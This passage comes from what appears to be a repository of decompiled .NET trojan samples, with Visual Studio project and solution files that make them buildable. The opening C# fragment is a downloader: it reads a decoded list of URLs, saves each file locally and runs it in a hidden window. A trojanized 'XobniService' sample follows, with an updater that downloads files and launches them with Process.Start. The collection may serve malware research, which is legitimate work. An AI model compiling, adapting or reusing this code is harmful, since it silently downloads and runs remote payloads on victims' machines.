(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3FF838A6-B2D0-4042-B284-421D7F00338F}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.csproj", "{3FF838A6-B2D0-4042-B284-421D7F00338F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3FF838A6-B2D0-4042-B284-421D7F00338F}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("Xobni Corporation")]
[assembly: AssemblyProduct("XobniService")]
[assembly: AssemblyCopyright("Copyright © 2007-2009 Xobni Corporation")]
[assembly: AssemblyTitle("XobniService")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: ComVisible(false)]
[assembly: Dotfuscator("57259:1:0:4.2.5005.34681", 0)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.8.3.7917")]
[assembly: Guid("7325476e-5347-4dc7-8737-4fd22ee30635")]
[assembly: AssemblyVersion("1.8.3.7917")]
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/DotfuscatorAttribute.cs
+33
View File
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: DotfuscatorAttribute
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Runtime.InteropServices;
[AttributeUsage(AttributeTargets.Assembly)]
[ComVisible(false)]
public sealed class DotfuscatorAttribute : Attribute
{
private string a;
private int c;
public DotfuscatorAttribute(string a, int c)
{
DotfuscatorAttribute dotfuscatorAttribute = this;
// ISSUE: explicit constructor call
dotfuscatorAttribute.\u002Ector();
dotfuscatorAttribute.a = a;
this.c = c;
}
public string A => this.a;
public string a() => this.a;
public int C => this.c;
public int c() => this.c;
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/GroupPolicy/PolicySetting.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: GroupPolicy.PolicySetting
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
namespace GroupPolicy
{
public enum PolicySetting
{
Off,
On,
NotConfigured,
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/Trojan.Win32.Patched.mf.csproj
+65
View File
@@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>XobniService</AssemblyName>
<ApplicationVersion>1.8.3.7917</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Web" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="DotfuscatorAttribute.cs" />
<Compile Include="x.cs" />
<Compile Include="o4.cs" />
<Compile Include="u5.cs" />
<Compile Include="eh.cs" />
<Compile Include="ady.cs" />
<Compile Include="p3.cs" />
<Compile Include="jf.cs" />
<Compile Include="l9.cs" />
<Compile Include="aaa.cs" />
<Compile Include="hs.cs" />
<Compile Include="rx.cs" />
<Compile Include="gs.cs" />
<Compile Include="q8.cs" />
<Compile Include="lq.cs" />
<Compile Include="fb.cs" />
<Compile Include="uj.cs" />
<Compile Include="lo.cs" />
<Compile Include="ks.cs" />
<Compile Include="GroupPolicy\PolicySetting.cs" />
<Compile Include="XobniLogging\Level.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="x.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/Trojan.Win32.Patched.mf.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XobniService", "Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.csproj", "{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{502BA071-D20D-4ACB-ABAE-90EAC7DDA9E6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/XobniLogging/Level.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: XobniLogging.Level
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
namespace XobniLogging
{
internal enum Level
{
Debug,
Exception,
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/aaa.cs
+35
View File
@@ -0,0 +1,35 @@
// Decompiled with JetBrains decompiler
// Type: aaa
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System.Runtime.CompilerServices;
internal class aaa
{
private int a;
private string b;
private string c;
private string d;
public aaa(int A_0, string A_1, string A_2, string A_3)
{
this.a = A_0;
this.b = A_1;
this.c = A_2;
this.d = A_3;
}
[SpecialName]
public int a() => this.a;
[SpecialName]
public string c() => this.b;
[SpecialName]
public string b() => this.c;
[SpecialName]
public string d() => this.d;
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/ady.cs
+197
View File
@@ -0,0 +1,197 @@
// Decompiled with JetBrains decompiler
// Type: ady
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Text;
using System.Xml;
using XobniLogging;
internal static class ady
{
private const int a = 200;
private const int b = 50000;
private const string c = "Software\\Xobni\\Settings";
private const int d = 200000;
private const int e = 1000000;
private static bool? f = new bool?();
private static readonly UnicodeEncoding g = new UnicodeEncoding(!BitConverter.IsLittleEndian, false, false);
internal static void a(Level A_0, string A_1, Exception A_2)
{
string A_1_1 = ady.a(A_1, A_2, A_0);
ady.a(A_0, A_1_1);
}
internal static void a(Level A_0, string A_1)
{
try
{
if (A_1 == null)
throw new ArgumentNullException("message");
if (A_0 == Level.Exception)
ady.d(ady.c(A_1));
ady.b(A_1);
}
catch (Exception ex)
{
try
{
ady.b(ex.ToString());
}
catch
{
}
}
}
private static void d(string A_0)
{
string s = Environment.NewLine + Environment.NewLine + A_0 + Environment.NewLine + Environment.NewLine;
byte[] bytes = ady.g.GetBytes(s);
string str = Path.Combine(ady.b(), "Xobni.log");
if (File.Exists(str) && new FileInfo(str).Length > 50000L)
return;
using (FileStream fileStream = new FileStream(str, FileMode.Append, FileAccess.Write, FileShare.None))
fileStream.Write(bytes, 0, bytes.Length);
}
internal static string b()
{
RegistryKey currentUser = Registry.CurrentUser;
string path = string.Empty;
try
{
using (RegistryKey registryKey = currentUser.OpenSubKey("Software\\Xobni", false))
{
if (registryKey != null)
path = registryKey.GetValue("DataFiles") as string;
}
}
catch (Exception ex)
{
ady.b("Error getting location of directory from registry");
}
if (string.IsNullOrEmpty(path))
path = ady.a();
if (!string.IsNullOrEmpty(path))
{
try
{
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
if ((new DirectoryInfo(path).Attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly)
{
ady.b("Directory " + path + " is read-only, using default directory");
path = ady.a();
}
}
catch (Exception ex)
{
ady.b("Error creating directory: " + path);
ady.b("Reverting to default data file directory");
path = ady.a();
}
}
else
path = ady.a();
return path;
}
private static string a() => Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Xobni\\";
private static string a(string A_0, Exception A_1, Level A_2)
{
Dictionary<string, string> A_0_1 = new Dictionary<string, string>();
A_0_1.Add("DescriptionHint", A_0);
A_0_1.Add("Level", Enum.GetName(typeof (Level), (object) A_2));
A_0_1.Add("Message", A_1.Message);
A_0_1.Add("Type", A_1.GetType().Name);
A_0_1.Add("StackTrace", A_1.StackTrace);
if (A_1.InnerException != null)
{
A_0_1.Add("InnerMessage", A_1.InnerException.Message);
A_0_1.Add("InnerStackTrace", A_1.InnerException.StackTrace);
if (A_1.InnerException.InnerException != null)
{
A_0_1.Add("InnerInnerMessage", A_1.InnerException.InnerException.Message);
A_0_1.Add("InnerInnerStackTrace", A_1.InnerException.InnerException.StackTrace);
}
}
return ady.a(A_0_1);
}
public static string a(Dictionary<string, string> A_0)
{
if (A_0 == null)
return (string) null;
XmlDocument xmlDocument = new XmlDocument();
XmlElement element1 = xmlDocument.CreateElement("Exception");
int num1 = 0;
foreach (KeyValuePair<string, string> keyValuePair in A_0)
{
int num2 = keyValuePair.Value != null ? keyValuePair.Value.Length : 0;
num1 += keyValuePair.Key.Length + num2;
if (keyValuePair.Key.Length <= 200000 && num2 <= 200000)
{
if (num1 <= 1000000)
{
XmlElement element2 = xmlDocument.CreateElement(keyValuePair.Key);
element2.AppendChild((XmlNode) xmlDocument.CreateTextNode(keyValuePair.Value ?? "NULL"));
element1.AppendChild((XmlNode) element2);
}
else
break;
}
}
xmlDocument.AppendChild((XmlNode) element1);
XmlWriterSettings settings = new XmlWriterSettings();
settings.ConformanceLevel = ConformanceLevel.Fragment;
settings.OmitXmlDeclaration = true;
StringBuilder output = new StringBuilder();
XmlWriter w = XmlWriter.Create(output, settings);
if (xmlDocument.DocumentElement != null)
xmlDocument.DocumentElement.WriteTo(w);
w.Flush();
return output.ToString();
}
private static string c(string A_0)
{
Version version = Assembly.GetExecutingAssembly().GetName().Version;
return "[" + DateTime.UtcNow.ToString("dd/MMM/yyyy HH:mm:ss.ffff") + "] Xobni-" + (object) version + ": " + A_0;
}
internal static void b(string A_0)
{
if (!ady.f.HasValue)
ady.f = new bool?(ady.a("ConnectorOutputDebug") != null);
string str = ady.c(A_0);
if (!ady.f.Value)
return;
int length;
for (int startIndex = 0; startIndex < str.Length; startIndex += length)
{
length = Math.Min(200, str.Length - startIndex);
Debugger.Log(1, "", str.Substring(startIndex, length));
}
}
private static string a(string A_0)
{
using (RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
{
if (registryKey1 != null)
return registryKey1.GetValue(A_0, (object) null) as string;
using (RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Xobni\\Settings", false))
return registryKey2 == null ? (string) null : registryKey2.GetValue(A_0, (object) null) as string;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/eh.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: eh
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Runtime.InteropServices;
public static class eh
{
public static void b(string A_0) => eh.a("DllRegisterServer", A_0);
public static void a(string A_0) => eh.a("DllUnregisterServer", A_0);
public static void a(string A_0, string A_1)
{
IntPtr A_0_1 = IntPtr.Zero;
try
{
A_0_1 = eh.LoadLibrary(A_1);
IntPtr ptr = !(A_0_1 == IntPtr.Zero) ? eh.GetProcAddress(A_0_1, A_0) : throw new Exception("Could not load library: " + (object) Marshal.GetLastWin32Error());
if (ptr == IntPtr.Zero)
throw new Exception("Could not find DllRegisterServer entry point: " + (object) Marshal.GetLastWin32Error());
int num = ((eh.a) Marshal.GetDelegateForFunctionPointer(ptr, typeof (eh.a)))();
}
finally
{
if (A_0_1 != IntPtr.Zero && !eh.FreeLibrary(A_0_1))
throw new Exception("Could not FreeLibrary: " + (object) Marshal.GetLastWin32Error());
}
}
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetProcAddress(IntPtr A_0, string A_1);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr LoadLibrary(string A_0);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool FreeLibrary(IntPtr A_0);
private delegate int a();
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/fb.cs
+155
View File
@@ -0,0 +1,155 @@
// Decompiled with JetBrains decompiler
// Type: fb
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using System;
using System.Diagnostics;
using System.IO;
using XobniLogging;
internal static class fb
{
private const string a = "XobniServiceUpdates";
private const string b = "XobniServiceUpdatesExec";
internal static void a()
{
try
{
try
{
if (!rx.g())
{
ady.a(Level.Debug, "CheckForNewUpdates disabled by Group Policy");
return;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Group Policy", ex);
}
try
{
ady.a(Level.Debug, "CheckForNewUpdates started");
if (hs.b(Path.Combine(hs.a(), "XobniServiceUpdates"), "XobniServiceUpdates") == null)
return;
ady.a(Level.Debug, "Update is available.");
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level", ex);
}
finally
{
ady.a(Level.Debug, "Finished.");
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer catch block", ex);
}
}
internal static void a(bool? A_0)
{
if (A_0.GetValueOrDefault(false))
return;
try
{
try
{
try
{
if (!rx.g())
{
ady.a(Level.Debug, "RunExistingUpdates disabled by Group Policy");
return;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Group Policy", ex);
}
ady.a(Level.Debug, "RunExistingUpdates started");
string path1 = hs.a();
string str1 = Path.Combine(path1, "XobniServiceUpdates");
string str2 = Path.Combine(path1, "XobniServiceUpdatesExec");
if (!hs.c(str1))
return;
aaa A_1 = hs.b("XobniServiceUpdatesPreUpdate");
if (A_1 == null)
{
try
{
if (!Directory.Exists(str1))
return;
foreach (string file in Directory.GetFiles(str1))
File.Delete(file);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't delete existing downloads from " + str1, ex);
}
}
else
{
string str3 = Path.Combine(str1, A_1.b());
string str4 = Path.Combine(str2, A_1.b());
if (!hs.a(str1, A_1))
{
try
{
File.Delete(str3);
ady.a(Level.Debug, "Deleted unverified download:" + str3);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Couldn't delete unverified download: " + str3, ex);
}
}
else
{
if (!Directory.Exists(str2))
{
ady.a(Level.Debug, "Creating updates exec directory.");
Directory.CreateDirectory(str2);
}
if (File.Exists(str4))
{
try
{
File.Delete(str4);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Could not delete target file " + str4, ex);
}
}
try
{
File.Move(str3, str4);
}
catch (Exception ex)
{
ady.a(Level.Exception, "Could not move file " + str3 + " to " + str4, ex);
}
Process.Start(str4);
}
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Top level", ex);
}
finally
{
ady.a(Level.Debug, "Finished.");
}
}
catch
{
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/gs.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: gs
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web;
using XobniLogging;
internal static class gs
{
internal static a? a<a>(object A_0) where a : struct => A_0 == null ? new a?() : new a?((a) A_0);
internal static string a(IEnumerable<KeyValuePair<string, string>> A_0)
{
List<string> stringList = new List<string>();
foreach (KeyValuePair<string, string> keyValuePair in A_0)
stringList.Add(HttpUtility.UrlEncode(keyValuePair.Key) + "=" + HttpUtility.UrlEncode(keyValuePair.Value));
return string.Join("&", stringList.ToArray());
}
internal static bool? b()
{
try
{
return new bool?(Process.GetProcessesByName("OUTLOOK").Length > 0);
}
catch (InvalidOperationException ex)
{
ady.a(Level.Exception, "IsOutlookRunning", (Exception) ex);
return new bool?();
}
}
internal static string a()
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Xobni"))
return registryKey == null ? (string) null : registryKey.GetValue("InstallDir") as string;
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/hs.cs
+329
View File
@@ -0,0 +1,329 @@
// Decompiled with JetBrains decompiler
// Type: hs
// Assembly: XobniService, Version=1.8.3.7917, Culture=neutral, PublicKeyToken=6298d2d1fcfb5d85
// MVID: EA9F7D71-4A8D-4739-A320-5F01FC76E972
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Xml;
using XobniLogging;
public class hs
{
private const string a = "XobniUpdaterShared";
private const string b = "E=support@xobni.com, CN=XobniUpdate, O=Xobni Corporation, S=CA, C=US";
private const string c = "{0}?version={1}&source={2}&xmid={3}";
public static readonly string d = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Xobni");
private static readonly string e = "http://updates." + u5.a() + "/update";
private static string f = (string) null;
private static readonly X509Certificate2 g = new X509Certificate2(Encoding.UTF8.GetBytes("\r\n-----BEGIN CERTIFICATE-----\r\nMIIExDCCA6ygAwIBAgIJAI0ql5mKlFKYMA0GCSqGSIb3DQEBBQUAMIGcMQswCQYD\r\nVQQGEwJVUzELMAkGA1UECBMCQ0ExFjAUBgNVBAcTDVNhbiBGcmFuY2lzY28xGjAY\r\nBgNVBAoTEVhvYm5pIENvcnBvcmF0aW9uMRwwGgYDVQQLExNFZGd5IEdydWZmIFNl\r\nY3VyaXR5MREwDwYDVQQDEwhYb2JuaSBDQTEbMBkGCSqGSIb3DQEJARYMY2FAeG9i\r\nbmkuY29tMB4XDTA3MDcxMTAyNDUyNVoXDTE3MDcwODAyNDUyNVowgZwxCzAJBgNV\r\nBAYTAlVTMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNjbzEaMBgG\r\nA1UEChMRWG9ibmkgQ29ycG9yYXRpb24xHDAaBgNVBAsTE0VkZ3kgR3J1ZmYgU2Vj\r\ndXJpdHkxETAPBgNVBAMTCFhvYm5pIENBMRswGQYJKoZIhvcNAQkBFgxjYUB4b2Ju\r\naS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC1cDGSvJVhrET8\r\niih6B77OwPeuD7AzUFvFq2zakCB6TvKzfc4KjxZuOhH3WU1wk64YAF3102bvA+7O\r\nlvOGeDJ9b5zYCQxpva2ey0HkuaxroT3fHz2ZfiWsUmcqvE/4XNri6JTdj+B4djf6\r\nPfNoE2nsxyS8LFu7oWCB5g0aRpxhbZbB0djmLQOphclw7uNETQekid0Gi/g7buFS\r\nCq8r77rnwuBsVuHKjtmWl3/+cgEHKvNxbYd1LLbkAvjiDw6IiIhpGvghbFgFQkmc\r\nMAvwzijep/Ala5xUzZFsMuLlnZhBQzmGKoWClawUALdgm/NEp+pnDb5AGOpfCWbb\r\nGhc9n/PBAgMBAAGjggEFMIIBATAdBgNVHQ4EFgQUiGwYgUQupLrtpqNAPnu+Pi7D\r\n/IAwgdEGA1UdIwSByTCBxoAUiGwYgUQupLrtpqNAPnu+Pi7D/IChgaKkgZ8wgZwx\r\nCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNj\r\nbzEaMBgGA1UEChMRWG9ibmkgQ29ycG9yYXRpb24xHDAaBgNVBAsTE0VkZ3kgR3J1\r\nZmYgU2VjdXJpdHkxETAPBgNVBAMTCFhvYm5pIENBMRswGQYJKoZIhvcNAQkBFgxj\r\nYUB4b2JuaS5jb22CCQCNKpeZipRSmDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEB\r\nBQUAA4IBAQCBFcZV4FD0ljxSe5JCn14beYGfXxm06Opv2LsyboqywFzUE/ABZj7Z\r\nOeCV1IEQfFYb4TC+9/3Yq1FXkJhNcPajuCrm9Nq7OPxZeUD02mt45e8FS6FMadEm\r\nb6pTXETehoIcs2eYUI9dPEfKdoTOCRXDuEruOh2CjO+P0aNxSbzqTfgprcV1qSno\r\nFMDVnmH155+L8Jh9kK+ZLHms/Udcgz0YAzgze0eGKWMa2rrwCSNkqyEvkK34Ed/C\r\nXn3H0Z6AAq22Fc/bKJG